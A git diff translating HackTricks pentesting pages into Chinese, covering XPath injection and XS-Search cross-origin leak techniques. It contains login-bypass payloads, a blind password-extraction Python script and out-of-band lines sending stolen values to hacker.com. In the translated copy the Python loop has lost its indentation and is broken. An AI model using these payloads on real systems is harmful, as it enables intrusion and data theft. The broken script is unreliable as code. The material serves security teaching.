-
+### **滥用空值注入**
 ```
 Username: ' or 1]%00
 ```
+### **用户名或密码中的双重OR**（仅在一个脆弱字段中有效）
 
-### **Double OR in Username or in password** (is valid with only 1 vulnerable field)
-
-IMPORTANT: Notice that the **"and" is the first operation made**.
-
+重要提示：请注意，**“and”是第一个执行的操作**。
 ```
 Bypass with first match
 (This requests are also valid without spaces)
@@ -212,11 +199,9 @@ admin' or '
 admin' or '1'='2
 string(//user[name/text()='admin' or '1'='2' and password/text()='']/account/text())
 ```
+## 字符串提取
 
-## String extraction
-
-The output contains strings and the user can manipulate the values to search:
-
+输出包含字符串，用户可以操纵这些值进行搜索：
 ```
 /user/username[contains(., '+VALUE+')]
 ```
@@ -235,11 +220,9 @@ The output contains strings and the user can manipulate the values to search:
 ')] | //user/*[3] | a[(' #The password of all users
 ')] | //user/*[4] | a[(' #The account of all users
 ```
+## 盲目利用
 
-## Blind Explotation
-
-### **Get length of a value and extract it by comparisons:**
-
+### **通过比较获取值的长度并提取它：**
 ```bash
 ' or string-length(//user[position()=1]/child::node()[position()=1])=4 or ''=' #True if length equals 4
 ' or substring((//user[position()=1]/child::node()[position()=1]),1,1)="a" or ''=' #True is first equals "a"
@@ -248,9 +231,7 @@ substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)
 
 ... and ( if ( $employee/role = 2 ) then error() else 0 )... #When error() is executed it rises an error and never returns a value
 ```
-
-### **Python Example**
-
+### **Python 示例**
 ```python
 import requests, string
 
@@ -258,28 +239,24 @@ flag = ""
 l = 0
 alphabet = string.ascii_letters + string.digits + "{}_()"
 for i in range(30):
-    r = requests.get("http://example.com?action=user&userid=2 and string-length(password)=" + str(i))
-    if ("TRUE_COND" in r.text):
-        l = i
-        break
+r = requests.get("http://example.com?action=user&userid=2 and string-length(password)=" + str(i))
+if ("TRUE_COND" in r.text):
+l = i
+break
 print("[+] Password length: " + str(l))
 for i in range(1, l + 1): #print("[i] Looking for char number " + str(i))
-    for al in alphabet:
-        r = requests.get("http://example.com?action=user&userid=2 and substring(password,"+str(i)+",1)="+al)
-        if ("TRUE_COND" in r.text):
-            flag += al
-            print("[+] Flag: " + flag)
-            break
+for al in alphabet:
+r = requests.get("http://example.com?action=user&userid=2 and substring(password,"+str(i)+",1)="+al)
+if ("TRUE_COND" in r.text):
+flag += al
+print("[+] Flag: " + flag)
+break
 ```
-
-### Read file
-
+### 读取文件
 ```python
 (substring((doc('file://protected/secret.xml')/*[1]/*[1]/text()[1]),3,1))) < 127
 ```
-
-## OOB Exploitation
-
+## OOB 利用
 ```python
 doc(concat("http://hacker.com/oob/", RESULTS))
 doc(concat("http://hacker.com/oob/", /Employees/Employee[1]/username))
@@ -290,8 +267,7 @@ doc-available(concat("http://hacker.com/oob/", RESULTS))
 #the doc available will respond true or false depending if the doc exists,
 #user not(doc-available(...)) to invert the result if you need to
 ```
-
-### Automatic tool
+### 自动工具
 
 - [xcat](https://xcat.readthedocs.io/)
 - [xxxpwn](https://github.com/feakk/xxxpwn)
@@ -299,7 +275,7 @@ doc-available(concat("http://hacker.com/oob/", RESULTS))
 - [xpath-blind-explorer](https://github.com/micsoftvn/xpath-blind-explorer)
 - [XmlChor](https://github.com/Harshal35/XMLCHOR)
 
-## References
+## 参考文献
 
 - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20Injection)
 - [https://wiki.owasp.org/index.php/Testing_for_XPath_Injection\_(OTG-INPVAL-010)](<https://wiki.owasp.org/index.php/Testing_for_XPath_Injection_(OTG-INPVAL-010)>)
@@ -307,18 +283,17 @@ doc-available(concat("http://hacker.com/oob/", RESULTS))
 
 <figure><img src="../images/image (3).png" alt=""><figcaption></figcaption></figure>
 
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
+加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器，与经验丰富的黑客和漏洞赏金猎人交流！
 
-**Hacking Insights**\
-Engage with content that delves into the thrill and challenges of hacking
+**黑客见解**\
+参与深入探讨黑客的刺激与挑战的内容
 
-**Real-Time Hack News**\
-Keep up-to-date with fast-paced hacking world through real-time news and insights
+**实时黑客新闻**\
+通过实时新闻和见解，跟上快速变化的黑客世界
 
-**Latest Announcements**\
-Stay informed with the newest bug bounties launching and crucial platform updates
+**最新公告**\
+了解最新的漏洞赏金计划和重要平台更新
 
-**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!
+**加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy)，今天就开始与顶尖黑客合作吧！
 
 {{#include ../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/xs-search.md b/src/pentesting-web/xs-search.md
index a67febee0..f8a472951 100644
--- a/src/pentesting-web/xs-search.md
+++ b/src/pentesting-web/xs-search.md
@@ -2,176 +2,172 @@
 
 <figure><img src="../images/image (3) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
-Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+使用 [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) 轻松构建和 **自动化工作流程**，由世界上 **最先进** 的社区工具提供支持。\
+立即获取访问权限：
 
 {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
 
 {{#include ../banners/hacktricks-training.md}}
 
-## Basic Information
+## 基本信息
 
-XS-Search is a method used for **extracting cross-origin information** by leveraging **side channel vulnerabilities**.
+XS-Search 是一种通过利用 **侧信道漏洞** 来 **提取跨源信息** 的方法。
 
-Key components involved in this attack include:
+此攻击涉及的关键组件包括：
 
-- **Vulnerable Web**: The target website from which information is intended to be extracted.
-- **Attacker's Web**: The malicious website created by the attacker, which the victim visits, hosting the exploit.
-- **Inclusion Method**: The technique employed to incorporate the Vulnerable Web into the Attacker's Web (e.g., window.open, iframe, fetch, HTML tag with href, etc.).
-- **Leak Technique**: Techniques used to discern differences in the state of the Vulnerable Web based on information gathered through the inclusion method.
-- **States**: The two potential conditions of the Vulnerable Web, which the attacker aims to distinguish.
-- **Detectable Differences**: Observable variations that the attacker relies on to infer the state of the Vulnerable Web.
+- **易受攻击的网络**：目标网站，信息旨在从中提取。
+- **攻击者的网络**：攻击者创建的恶意网站，受害者访问，托管漏洞。
+- **包含方法**：将易受攻击的网络纳入攻击者网络所采用的技术（例如，window.open、iframe、fetch、带 href 的 HTML 标签等）。
+- **泄漏技术**：用于根据通过包含方法收集的信息来辨别易受攻击的网络状态差异的技术。
+- **状态**：易受攻击的网络的两种潜在条件，攻击者旨在区分。
+- **可检测差异**：攻击者依赖于可观察的变化来推断易受攻击的网络状态。
 
-### Detectable Differences
+### 可检测差异
 
-Several aspects can be analyzed to differentiate the states of the Vulnerable Web:
+可以分析多个方面以区分易受攻击的网络的状态：
 
-- **Status Code**: Distinguishing between **various HTTP response status codes** cross-origin, like server errors, client errors, or authentication errors.
-- **API Usage**: Identifying **usage of Web APIs** across pages, revealing whether a cross-origin page employs a specific JavaScript Web API.
-- **Redirects**: Detecting navigations to different pages, not just HTTP redirects but also those triggered by JavaScript or HTML.
-- **Page Content**: Observing **variations in the HTTP response body** or in page sub-resources, such as the **number of embedded frames** or size disparities in images.
-- **HTTP Header**: Noting the presence or possibly the value of a **specific HTTP response header**, including headers like X-Frame-Options, Content-Disposition, and Cross-Origin-Resource-Policy.
-- **Timing**: Noticing consistent time disparities between the two states.
+- **状态码**：区分 **各种 HTTP 响应状态码** 跨源，如服务器错误、客户端错误或身份验证错误。
+- **API 使用**：识别跨页面的 **Web API 使用情况**，揭示跨源页面是否使用特定的 JavaScript Web API。
+- **重定向**：检测导航到不同页面，不仅是 HTTP 重定向，还有由 JavaScript 或 HTML 触发的重定向。
+- **页面内容**：观察 **HTTP 响应体中的变化** 或页面子资源中的变化，例如 **嵌入框的数量** 或图像的大小差异。
+- **HTTP 头**：注意 **特定 HTTP 响应头** 的存在或可能的值，包括 X-Frame-Options、Content-Disposition 和 Cross-Origin-Resource-Policy 等头。
+- **时间**：注意两种状态之间的一致时间差异。
 
-### Inclusion Methods
+### 包含方法
 
-- **HTML Elements**: HTML offers various elements for **cross-origin resource inclusion**, like stylesheets, images, or scripts, compelling the browser to request a non-HTML resource. A compilation of potential HTML elements for this purpose can be found at [https://github.com/cure53/HTTPLeaks](https://github.com/cure53/HTTPLeaks).
-- **Frames**: Elements such as **iframe**, **object**, and **embed** can embed HTML resources directly into the attacker's page. If the page **lacks framing protection**, JavaScript can access the framed resource’s window object via the contentWindow property.
-- **Pop-ups**: The **`window.open`** method opens a resource in a new tab or window, providing a **window handle** for JavaScript to interact with methods and properties following the SOP. Pop-ups, often used in single sign-on, circumvent framing and cookie restrictions of a target resource. However, modern browsers restrict pop-up creation to certain user actions.
-- **JavaScript Requests**: JavaScript permits direct requests to target resources using **XMLHttpRequests** or the **Fetch API**. These methods offer precise control over the request, like opting to follow HTTP redirects.
+- **HTML 元素**：HTML 提供了多种用于 **跨源资源包含** 的元素，如样式表、图像或脚本，迫使浏览器请求非 HTML 资源。可以在 [https://github.com/cure53/HTTPLeaks](https://github.com/cure53/HTTPLeaks) 找到此目的的潜在 HTML 元素的汇编。
+- **框架**：如 **iframe**、**object** 和 **embed** 的元素可以将 HTML 资源直接嵌入攻击者的页面。如果页面 **缺乏框架保护**，JavaScript 可以通过 contentWindow 属性访问框架资源的窗口对象。
+- **弹出窗口**：**`window.open`** 方法在新标签或窗口中打开资源，为 JavaScript 提供 **窗口句柄**，以便与遵循 SOP 的方法和属性进行交互。弹出窗口通常用于单点登录，绕过目标资源的框架和 cookie 限制。然而，现代浏览器将弹出窗口的创建限制为某些用户操作。
+- **JavaScript 请求**：JavaScript 允许使用 **XMLHttpRequests** 或 **Fetch API** 直接请求目标资源。这些方法提供对请求的精确控制，例如选择跟随 HTTP 重定向。
 
-### Leak Techniques
+### 泄漏技术
 
-- **Event Handler**: A classical leak technique in XS-Leaks, where event handlers like **onload** and **onerror** provide insights about resource loading success or failure.
-- **Error Messages**: JavaScript exceptions or special error pages can provide leak information either directly from the error message or by differentiating between its presence and absence.
-- **Global Limits**: Physical limitations of a browser, like memory capacity or other enforced browser limits, can signal when a threshold is reached, serving as a leak technique.
-- **Global State**: Detectable interactions with browsers' **global states** (e.g., the History interface) can be exploited. For instance, the **number of entries** in a browser's history can offer clues about cross-origin pages.
-- **Performance API**: This API provides **performance details of the current page**, including network timing for the document and loaded resources, enabling inferences about requested resources.
-- **Readable Attributes**: Some HTML attributes are **readable cross-origin** and can be used as a leak technique. For instance, the `window.frame.length` property allows JavaScript to count the frames included in a webpage cross-origin.
+- **事件处理程序**：XS-Leaks 中的一种经典泄漏技术，其中事件处理程序如 **onload** 和 **onerror** 提供有关资源加载成功或失败的见解。
+- **错误消息**：JavaScript 异常或特殊错误页面可以直接从错误消息中提供泄漏信息，或通过区分其存在与否来提供信息。
+- **全局限制**：浏览器的物理限制，如内存容量或其他强制的浏览器限制，可以在达到阈值时发出信号，作为泄漏技术。
+- **全局状态**：可检测与浏览器的 **全局状态**（例如，历史接口）的交互可以被利用。例如，浏览器历史中的 **条目数量** 可以提供有关跨源页面的线索。
+- **性能 API**：此 API 提供 **当前页面的性能细节**，包括文档和加载资源的网络时序，从而使对请求资源的推断成为可能。
+- **可读属性**：某些 HTML 属性是 **跨源可读** 的，可以用作泄漏技术。例如，`window.frame.length` 属性允许 JavaScript 计算跨源网页中包含的框架数量。
 
-## XSinator Tool & Paper
+## XSinator 工具与论文
 
-XSinator is an automatic tool to **check browsers against several know XS-Leaks** explained in its paper: [**https://xsinator.com/paper.pdf**](https://xsinator.com/paper.pdf)
+XSinator 是一个自动化工具，用于 **检查浏览器是否存在多种已知的 XS-Leaks**，在其论文中进行了说明：[**https://xsinator.com/paper.pdf**](https://xsinator.com/paper.pdf)
 
-You can **access the tool in** [**https://xsinator.com/**](https://xsinator.com/)
+您可以在 [**https://xsinator.com/**](https://xsinator.com/) **访问该工具**
 
 > [!WARNING]
-> **Excluded XS-Leaks**: We had to exclude XS-Leaks that rely on **service workers** as they would interfere with other leaks in XSinator. Furthermore, we chose to **exclude XS-Leaks that rely on misconfiguration and bugs in a specific web application**. For example, CrossOrigin Resource Sharing (CORS) misconfigurations, postMessage leakage or Cross-Site Scripting. Additionally, we excluded timebased XS-Leaks since they often suffer from being slow, noisy and inaccurate.
+> **排除的 XS-Leaks**：我们不得不排除依赖于 **服务工作者** 的 XS-Leaks，因为它们会干扰 XSinator 中的其他泄漏。此外，我们选择 **排除依赖于特定 Web 应用程序中的错误配置和漏洞的 XS-Leaks**。例如，跨源资源共享（CORS）错误配置、postMessage 泄漏或跨站脚本。此外，我们还排除了基于时间的 XS-Leaks，因为它们通常存在缓慢、嘈杂和不准确的问题。
 
 <figure><img src="../images/image (3) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+使用 [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) 轻松构建和 **自动化工作流程**，由世界上 **最先进** 的社区工具提供支持。\
+立即获取访问权限：
 
 {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
 
-## **Timing Based techniques**
+## **基于时间的技术**
 
-Some of the following techniques are going to use timing to as part of the process to detect differences in the possible states of the web pages. There are different ways to measure time in a web browser.
+以下一些技术将使用时间作为检测网页可能状态差异过程的一部分。测量时间在网页浏览器中有不同的方法。
 
-**Clocks**: The [performance.now()](https://developer.mozilla.org/en-US/docs/Web/API/Performance/now) API allows developers to get high-resolution timing measurements.\
-There are a considerable number of APIs attackers can abuse to create implicit clocks: [Broadcast Channel API](https://developer.mozilla.org/en-US/docs/Web/API/Broadcast_Channel_API), [Message Channel API](https://developer.mozilla.org/en-US/docs/Web/API/MessageChannel), [requestAnimationFrame](https://developer.mozilla.org/en-US/docs/Web/API/window/requestAnimationFrame), [setTimeout](https://developer.mozilla.org/en-US/docs/Web/API/WindowOrWorkerGlobalScope/setTimeout), CSS animations, and others.\
-For more info: [https://xsleaks.dev/docs/attacks/timing-attacks/clocks](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/).
+**时钟**： [performance.now()](https://developer.mozilla.org/en-US/docs/Web/API/Performance/now) API 允许开发人员获取高分辨率的时间测量。\
+攻击者可以滥用大量 API 来创建隐式时钟：[Broadcast Channel API](https://developer.mozilla.org/en-US/docs/Web/API/Broadcast_Channel_API)、[Message Channel API](https://developer.mozilla.org/en-US/docs/Web/API/MessageChannel)、[requestAnimationFrame](https://developer.mozilla.org/en-US/docs/Web/API/window/requestAnimationFrame)、[setTimeout](https://developer.mozilla.org/en-US/docs/Web/API/WindowOrWorkerGlobalScope/setTimeout)、CSS 动画等。\
+更多信息请参见：[https://xsleaks.dev/docs/attacks/timing-attacks/clocks](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/)。
 
-## Event Handler Techniques
+## 事件处理程序技术
 
 ### Onload/Onerror
 
-- **Inclusion Methods**: Frames, HTML Elements
-- **Detectable Difference**: Status Code
-- **More info**: [https://www.usenix.org/conference/usenixsecurity19/presentation/staicu](https://www.usenix.org/conference/usenixsecurity19/presentation/staicu), [https://xsleaks.dev/docs/attacks/error-events/](https://xsleaks.dev/docs/attacks/error-events/)
-- **Summary**: if trying to load a resource onerror/onload events are triggered with the resource is loaded successfully/unsuccessfully it's possible to figure out the status code.
-- **Code example**: [https://xsinator.com/testing.html#Event%20Handler%20Leak%20(Script)](<https://xsinator.com/testing.html#Event%20Handler%20Leak%20(Script)>)
+- **包含方法**：框架，HTML 元素
+- **可检测差异**：状态码
+- **更多信息**：[https://www.usenix.org/conference/usenixsecurity19/presentation/staicu](https://www.usenix.org/conference/usenixsecurity19/presentation/staicu)，[https://xsleaks.dev/docs/attacks/error-events/](https://xsleaks.dev/docs/attacks/error-events/)
+- **总结**：如果尝试加载资源，onerror/onload 事件在资源成功/失败加载时被触发，可以推断出状态码。
+- **代码示例**：[https://xsinator.com/testing.html#Event%20Handler%20Leak%20(Script)](<https://xsinator.com/testing.html#Event%20Handler%20Leak%20(Script)>)
 
 {{#ref}}
 xs-search/cookie-bomb-+-onerror-xs-leak.md
 {{#endref}}
 
-The code example try lo **load scripts objects from JS**, but **other tags** such as objects, stylesheets, images, audios could be also used. Moreover, it's also possible to inject the **tag directly** and declare the `onload` and `onerror` events inside the tag (instead of injecting it from JS).
-
-There is also a script-less version of this attack:
+代码示例尝试 **从 JS 加载脚本对象**，但 **其他标签** 如对象、样式表、图像、音频也可以使用。此外，还可以直接注入 **标签** 并在标签内声明 `onload` 和 `onerror` 事件（而不是从 JS 注入）。
 
+此攻击还有一个无脚本版本：
 ```html
 <object data="//example.com/404">
-  <object data="//attacker.com/?error"></object>
+<object data="//attacker.com/?error"></object>
 </object>
 ```
+在这种情况下，如果 `example.com/404` 未找到，将加载 `attacker.com/?error`。
 
-In this case if `example.com/404` is not found `attacker.com/?error` will be loaded.
+### 加载时延
 
-### Onload Timing
-
-- **Inclusion Methods**: HTML Elements
-- **Detectable Difference**: Timing (generally due to Page Content, Status Code)
-- **More info**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#onload-events](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#onload-events)
-- **Summary:** The [**performance.now()**](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/#performancenow) **API** can be used to measure how much time it takes to perform a request. However, other clocks could be used, such as [**PerformanceLongTaskTiming API**](https://developer.mozilla.org/en-US/docs/Web/API/PerformanceLongTaskTiming) which can identify tasks running for more than 50ms.
-- **Code Example**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#onload-events](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#onload-events) another example in:
+- **包含方法**: HTML 元素
+- **可检测差异**: 时延（通常由于页面内容、状态码）
+- **更多信息**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#onload-events](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#onload-events)
+- **总结:** [**performance.now()**](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/#performancenow) **API** 可用于测量执行请求所需的时间。然而，也可以使用其他时钟，例如 [**PerformanceLongTaskTiming API**](https://developer.mozilla.org/en-US/docs/Web/API/PerformanceLongTaskTiming)，它可以识别运行超过 50 毫秒的任务。
+- **代码示例**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#onload-events](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#onload-events) 另一个示例在：
 
 {{#ref}}
 xs-search/performance.now-example.md
 {{#endref}}
 
-#### Onload Timing + Forced Heavy Task
+#### 加载时延 + 强制重任务
 
-This technique is just like the previous one, but the **attacker** will also **force** some action to take a **relevant amount time** when the **answer is positive or negative** and measure that time.
+此技术与前一种相似，但 **攻击者** 还将 **强制** 一些操作以花费 **相关的时间**，当 **答案为正或负** 时并测量该时间。
 
 {{#ref}}
 xs-search/performance.now-+-force-heavy-task.md
 {{#endref}}
 
-### unload/beforeunload Timing
+### 卸载/卸载前时延
 
-- **Inclusion Methods**: Frames
-- **Detectable Difference**: Timing (generally due to Page Content, Status Code)
-- **More info**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#unload-events](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#unload-events)
-- **Summary:** The [SharedArrayBuffer clock](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/#sharedarraybuffer-and-web-workers) can be used to measure how much time it takes to perform a request. Other clocks could be used.
-- **Code Example**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#unload-events](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#unload-events)
+- **包含方法**: 框架
+- **可检测差异**: 时延（通常由于页面内容、状态码）
+- **更多信息**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#unload-events](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#unload-events)
+- **总结:** [SharedArrayBuffer 时钟](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/#sharedarraybuffer-and-web-workers) 可用于测量执行请求所需的时间。也可以使用其他时钟。
+- **代码示例**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#unload-events](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#unload-events)
 
-The time taken to fetch a resource can be measured by utilizing the [`unload`](https://developer.mozilla.org/en-US/docs/Web/API/Window/unload_event) and [`beforeunload`](https://developer.mozilla.org/en-US/docs/Web/API/Window/beforeunload_event) events. The **`beforeunload`** event is fired when the browser is about to navigate to a new page, while the **`unload`** event occurs when the navigation is actually taking place. The time difference between these two events can be calculated to determine the **duration the browser spent fetching the resource**.
+获取资源所需的时间可以通过利用 [`unload`](https://developer.mozilla.org/en-US/docs/Web/API/Window/unload_event) 和 [`beforeunload`](https://developer.mozilla.org/en-US/docs/Web/API/Window/beforeunload_event) 事件来测量。**`beforeunload`** 事件在浏览器即将导航到新页面时触发，而 **`unload`** 事件在实际进行导航时发生。这两个事件之间的时间差可以计算出 **浏览器获取资源所花费的时间**。
 
-### Sandboxed Frame Timing + onload <a href="#sandboxed-frame-timing-attacks" id="sandboxed-frame-timing-attacks"></a>
+### 沙箱框架时延 + 加载 <a href="#sandboxed-frame-timing-attacks" id="sandboxed-frame-timing-attacks"></a>
 
-- **Inclusion Methods**: Frames
-- **Detectable Difference**: Timing (generally due to Page Content, Status Code)
-- **More info**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#sandboxed-frame-timing-attacks](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#sandboxed-frame-timing-attacks)
-- **Summary:** The [performance.now()](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/#performancenow) API can be used to measure how much time it takes to perform a request. Other clocks could be used.
-- **Code Example**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#sandboxed-frame-timing-attacks](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#sandboxed-frame-timing-attacks)
-
-It has been observed that in the absence of [Framing Protections](https://xsleaks.dev/docs/defenses/opt-in/xfo/), the time required for a page and its subresources to load over the network can be measured by an attacker. This measurement is typically possible because the `onload` handler of an iframe is triggered only after the completion of resource loading and JavaScript execution. To bypass the variability introduced by script execution, an attacker might employ the [`sandbox`](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe) attribute within the `<iframe>`. The inclusion of this attribute restricts numerous functionalities, notably the execution of JavaScript, thereby facilitating a measurement that is predominantly influenced by network performance.
+- **包含方法**: 框架
+- **可检测差异**: 时延（通常由于页面内容、状态码）
+- **更多信息**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#sandboxed-frame-timing-attacks](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#sandboxed-frame-timing-attacks)
+- **总结:** [performance.now()](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/#performancenow) API 可用于测量执行请求所需的时间。也可以使用其他时钟。
+- **代码示例**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#sandboxed-frame-timing-attacks](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#sandboxed-frame-timing-attacks)
 
+已观察到，在没有 [框架保护](https://xsleaks.dev/docs/defenses/opt-in/xfo/) 的情况下，攻击者可以测量页面及其子资源在网络上加载所需的时间。此测量通常是可能的，因为 iframe 的 `onload` 处理程序仅在资源加载和 JavaScript 执行完成后触发。为了绕过脚本执行引入的可变性，攻击者可能会在 `<iframe>` 中使用 [`sandbox`](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe) 属性。包含此属性会限制许多功能，特别是 JavaScript 的执行，从而促进主要受网络性能影响的测量。
 ```javascript
 // Example of an iframe with the sandbox attribute
 <iframe src="example.html" sandbox></iframe>
 ```
-
 ### #ID + error + onload
 
 - **Inclusion Methods**: Frames
-- **Detectable Difference**: Page Content
+- **Detectable Difference**: 页面内容
 - **More info**:
-- **Summary**: If you can make the page error when the correct content is accessed and make it load correctly when any content is accessed, then you can make a loop to extract all the information without measuring the time.
+- **Summary**: 如果您可以在访问正确内容时使页面出错，并在访问任何内容时使其正确加载，那么您可以创建一个循环来提取所有信息，而无需测量时间。
 - **Code Example**:
 
-Suppose that you can **insert** the **page** that has the **secret** content **inside an Iframe**.
+假设您可以**插入**包含**秘密**内容的**页面****在一个 Iframe** 中。
 
-You can **make the victim search** for the file that contains "_**flag**_" using an **Iframe** (exploiting a CSRF for example). Inside the Iframe you know that the _**onload event**_ will be **executed always at least once**. Then, you can **change** the **URL** of the **iframe** but changing only the **content** of the **hash** inside the URL.
+您可以**让受害者搜索**包含“_**flag**_”的文件，使用**Iframe**（例如，利用 CSRF）。在 Iframe 内，您知道 _**onload 事件**_ 将**至少执行一次**。然后，您可以**更改** **iframe** 的 **URL**，但仅更改 **URL** 中 **hash** 的 **内容**。
 
-For example:
+例如：
 
 1. **URL1**: www.attacker.com/xssearch#try1
 2. **URL2**: www.attacker.com/xssearch#try2
 
-If the first URL was **successfully loaded**, then, when **changing** the **hash** part of the URL the **onload** event **won't be triggered** again. But **if** the page had some kind of **error** when **loading**, then, the **onload** event will be **triggered again**.
+如果第一个 URL **成功加载**，那么，当**更改** URL 的 **hash** 部分时，**onload** 事件**不会再次触发**。但是**如果**页面在**加载**时出现某种**错误**，那么，**onload** 事件将**再次触发**。
 
-Then, you can **distinguish between** a **correctly** loaded page or page that has an **error** when is accessed.
+然后，您可以**区分**正确加载的页面或访问时出现**错误**的页面。
 
 ### Javascript Execution
 
 - **Inclusion Methods**: Frames
-- **Detectable Difference**: Page Content
+- **Detectable Difference**: 页面内容
 - **More info**:
-- **Summary:** If the **page** is **returning** the **sensitive** content, **or** a **content** that can be **controlled** by the user. The user could set **valid JS code in the negative case**, an **load** each try inside **`<script>`** tags, so in **negative** cases attackers **code** is **executed,** and in **affirmative** cases **nothing** will be executed.
+- **Summary:** 如果**页面**返回**敏感**内容，**或**可以由用户**控制**的**内容**。用户可以在**负面情况下**设置**有效的 JS 代码**，并在每次尝试中加载**`<script>`** 标签，因此在**负面**情况下攻击者的**代码**会被**执行**，而在**肯定**情况下**什么**都不会被执行。
 - **Code Example:**
 
 {{#ref}}
@@ -180,39 +176,39 @@ xs-search/javascript-execution-xs-leak.md
 
 ### CORB - Onerror
 
-- **Inclusion Methods**: HTML Elements
-- **Detectable Difference**: Status Code & Headers
+- **Inclusion Methods**: HTML 元素
+- **Detectable Difference**: 状态码 & 头部
 - **More info**: [https://xsleaks.dev/docs/attacks/browser-features/corb/](https://xsleaks.dev/docs/attacks/browser-features/corb/)
-- **Summary**: **Cross-Origin Read Blocking (CORB)** is a security measure that prevents web pages from loading certain sensitive cross-origin resources to protect against attacks like **Spectre**. However, attackers can exploit its protective behavior. When a response subject to **CORB** returns a _**CORB protected**_ `Content-Type` with `nosniff` and a `2xx` status code, **CORB** strips the response's body and headers. Attackers observing this can infer the combination of the **status code** (indicating success or error) and the `Content-Type` (denoting whether it's protected by **CORB**), leading to potential information leakage.
-- **Code Example:**
+- **Summary**: **跨源读取阻止 (CORB)** 是一种安全措施，防止网页加载某些敏感的跨源资源，以保护免受**Spectre**等攻击。然而，攻击者可以利用其保护行为。当受**CORB**保护的响应返回带有 `nosniff` 的 _**CORB 保护**_ `Content-Type` 和 `2xx` 状态码时，**CORB** 会剥离响应的主体和头部。观察到这一点的攻击者可以推断出**状态码**（指示成功或错误）和 `Content-Type`（表示是否受**CORB**保护）的组合，从而导致潜在的信息泄露。
+- **Code Example**:
 
-Check the more information link for more information about the attack.
+查看更多信息链接以获取有关攻击的更多信息。
 
 ### onblur
 
 - **Inclusion Methods**: Frames
-- **Detectable Difference**: Page Content
+- **Detectable Difference**: 页面内容
 - **More info**: [https://xsleaks.dev/docs/attacks/id-attribute/](https://xsleaks.dev/docs/attacks/id-attribute/), [https://xsleaks.dev/docs/attacks/experiments/portals/](https://xsleaks.dev/docs/attacks/experiments/portals/)
-- **Summary**: Leak sensitive data from the id or name attribute.
+- **Summary**: 从 id 或 name 属性泄露敏感数据。
 - **Code Example**: [https://xsleaks.dev/docs/attacks/id-attribute/#code-snippet](https://xsleaks.dev/docs/attacks/id-attribute/#code-snippet)
 
-It's possible to **load a page** inside an **iframe** and use the **`#id_value`** to make the page **focus on the element** of the iframe with indicated if, then if an **`onblur`** signal is triggered, the ID element exists.\
-You can perform the same attack with **`portal`** tags.
+可以**在一个 iframe** 中**加载一个页面**并使用 **`#id_value`** 使页面**聚焦于**指定的 iframe 元素，如果触发了**`onblur`** 信号，则 ID 元素存在。\
+您可以使用 **`portal`** 标签执行相同的攻击。
 
 ### postMessage Broadcasts <a href="#postmessage-broadcasts" id="postmessage-broadcasts"></a>
 
 - **Inclusion Methods**: Frames, Pop-ups
-- **Detectable Difference**: API Usage
+- **Detectable Difference**: API 使用
 - **More info**: [https://xsleaks.dev/docs/attacks/postmessage-broadcasts/](https://xsleaks.dev/docs/attacks/postmessage-broadcasts/)
-- **Summary**: Gather sensitive information from a postMessage or use the presence of postMessages as an oracle to know the status of the user in the page
-- **Code Example**: `Any code listening for all postMessages.`
+- **Summary**: 从 postMessage 收集敏感信息或使用 postMessages 的存在作为 oracle 来了解用户在页面上的状态
